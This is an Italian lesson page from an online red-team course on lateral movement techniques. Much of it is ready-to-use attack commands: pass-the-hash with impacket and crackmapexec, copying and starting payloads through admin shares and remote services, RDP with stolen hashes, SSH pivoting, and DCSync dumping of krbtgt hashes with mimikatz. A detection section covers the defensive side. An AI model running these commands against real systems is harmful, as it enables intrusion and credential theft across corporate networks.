Tecniche di movimento laterale
Si muova all'interno delle reti utilizzando WMI, PsExec, WinRM e condivisioni SMB senza attivare avvisi.
Tecniche di movimento laterale è una lezione Cyber Security Academy gratuita su CoddyKit. Questa è la lezione 3 di 4. Puoi leggere la lezione completa qui gratuitamente — poi esercitati direttamente nel browser con un editor di codice integrato e un tutor IA disponibile 24/7. Fa parte del percorso di apprendimento Cyber Security Academy, e i tuoi progressi si sincronizzano tra il web e l'app CoddyKit. Il corso Cyber Security Academy include 4 lezioni in totale.
Che cos'è il movimento laterale?
Il movimento laterale è l'insieme delle tecniche che gli attaccanti utilizzano per spostarsi progressivamente all'interno di una rete dopo la compromissione iniziale, passando dal primo punto d'appoggio verso obiettivi di maggior valore, come controller di dominio, database e sistemi di backup.
Pass-the-Hash (PtH)
L'autenticazione Windows NTLM consente di utilizzare direttamente l'hash della password invece della password in chiaro. Un attaccante che ha ottenuto gli hash NTLM può autenticarsi ad altri sistemi senza dover decifrare l'hash.
# Impacket psexec with PtH:
impacket-psexec -hashes :NTLM_HASH_HERE administrator@10.0.0.5
# CrackMapExec:
crackmapexec smb 10.0.0.0/24 -u administrator -H NTLM_HASHPass-the-Ticket (PtT)
I ticket Kerberos (TGT o TGS) possono essere estratti dalla memoria e importati per autenticarsi come il titolare del ticket. Gli attacchi Golden Ticket falsificano i TGT utilizzando l'hash KRBTGT e forniscono accesso Kerberos illimitato al dominio.
Esecuzione di codice da remoto: PSExec
psexec (Sysinternals e Impacket) esegue comandi su host Windows remoti tramite SMB e condivisioni amministrative. Richiede credenziali di amministratore. Crea un binario di servizio sul sistema di destinazione.
impacket-psexec administrator:Password@10.0.0.5
# Or via Metasploit:
use exploit/windows/smb/psexecMovimento laterale tramite WMI
Windows Management Instrumentation consente l'esecuzione di codice da remoto senza creare file rilevabili da molti strumenti:
# Using wmiexec (Impacket):
impacket-wmiexec administrator:Password@10.0.0.5
# Or via PowerShell:
$wmi = [wmiclass]"\\10.0.0.5\root\cimv2:Win32_Process"
$wmi.Create("cmd.exe /c payload.exe")SMB e condivisioni amministrative
Le condivisioni amministrative Windows (C$, ADMIN$, IPC$) consentono il movimento laterale con credenziali di amministratore:
# Mount admin share:
net use \\10.0.0.5\C$ /user:DOMAIN\administrator Password
# Copy and execute:
copy evil.exe \\10.0.0.5\C$\Windows\Temp\
impacket-smbexec administrator:Password@10.0.0.5Servizi remoti: sc e at
Crei servizi o attività pianificate sui sistemi remoti:
# Create remote service:
sc \\10.0.0.5 create EvilSvc binPath= "C:\Temp\payload.exe"
sc \\10.0.0.5 start EvilSvc
# Scheduled task:
impacket-atexec administrator:Password@10.0.0.5 "whoami > C:\Temp\out.txt"RDP e sessioni interattive
RDP (Remote Desktop Protocol, porta 3389) fornisce accesso interattivo completo. Gli attaccanti usano RDP con credenziali rubate. La difesa consiste nel limitare RDP ai jump server, richiedere NLA e registrare tutte le sessioni.
# RDP with stolen creds:
xfreerdp /u:administrator /p:Password /v:10.0.0.5
# Bypass NLA with NTLM hash:
xfreerdp /u:administrator /pth:NTLM_HASH /v:10.0.0.5SSH come movimento laterale
Negli ambienti Linux, gli attaccanti si spostano lateralmente tramite SSH utilizzando chiavi o credenziali rubate. L'abuso dell'agent forwarding consente di usare sistemi compromessi come punto di passaggio. I tunnel SSH inoltrano le porte per raggiungere sistemi altrimenti inaccessibili.
# SSH pivoting:
ssh -L 5432:internal-db:5432 user@pivot_host
# SSH dynamic SOCKS proxy:
ssh -D 1080 user@pivot_hostReplica di Active Directory (DCSync)
DCSync sfrutta la replica di AD per recuperare gli hash delle password direttamente dal DC senza eseguire codice su di esso: richiede il privilegio DS-Replication-Get-Changes-All:
# Impacket secretsdump:
impacket-secretsdump domain/user:password@dc_ip
# Mimikatz:
lsadump::dcsync /domain:corp.local /user:krbtgtRilevare il movimento laterale
Indicatori di rilevamento:
- Evento 4624 (accesso) con accessi di rete insoliti di tipo 3
- Creazione di servizi su host remoti (Evento 7045)
- Connessioni SMB tra workstation
- Creazione di processi WMI su host remoti
- Comportamento anomalo degli account (utente che accede da più macchine)
Verifica rapida: movimento laterale
Quale tecnica consente a un attaccante di autenticarsi ai sistemi Windows utilizzando un hash NTLM acquisito senza doverlo decifrare?
Riepilogo della lezione
Il movimento laterale utilizza credenziali e protocolli compromessi per diffondersi nella rete. Tecniche principali: Pass-the-Hash (riutilizzo dell'hash NTLM), Pass-the-Ticket (Kerberos), PSExec/WMI/SMB per l'esecuzione da remoto, DCSync per la raccolta delle credenziali del dominio. Rilevamento: accessi di rete insoliti (Evento 4624), creazione di servizi remoti (Evento 7045), traffico SMB tra workstation.
Domande Frequenti
La lezione «Tecniche di movimento laterale» è gratuita?
Sì — il testo completo di «Tecniche di movimento laterale» è gratuito qui sul web. Per esercitarvi in modo interattivo (un editor di codice integrato e un tutor IA 24/7) e sbloccare il resto del corso Cyber Security Academy, passa a CoddyKit PRO. Il corso Cyber Security Academy include 4 lezioni in totale.
Cosa imparerò in «Tecniche di movimento laterale»?
Si muova all'interno delle reti utilizzando WMI, PsExec, WinRM e condivisioni SMB senza attivare avvisi. Eserciti Cyber Security Academy con codice pratico che esegui direttamente nel browser, e un tutor IA 24/7 risponde alle tue domande mentre lavori sulla lezione.
Ho bisogno di esperienza per iniziare Cyber Security Academy?
Non è richiesta alcuna esperienza precedente. Cyber Security Academy su CoddyKit è strutturato per principianti e studenti avanzati, quindi puoi iniziare da qui o dall'inizio e procedere al tuo ritmo. Questa è la lezione 3 di 4.
Quanto tempo richiede la lezione «Tecniche di movimento laterale»?
La maggior parte delle lezioni CoddyKit richiede circa 5–10 minuti. Ogni lezione è breve e interattiva, quindi fai progressi costanti e riprendi esattamente da dove hai lasciato su web e app.
Posso scrivere ed eseguire codice in questa lezione Cyber Security Academy?
Sì. Ogni lezione Cyber Security Academy include un editor di codice integrato, quindi scrivi ed esegui codice reale direttamente nel tuo browser e ricevi feedback istantaneo dall'IA — nessuna configurazione locale necessaria.
Tutte le lezioni di questo corso
- Framework C2: Cobalt Strike e Sliver
- Binari Living-Off-the-Land (LOLBins)
- Tecniche di movimento laterale
- Stesura dei report di Red Team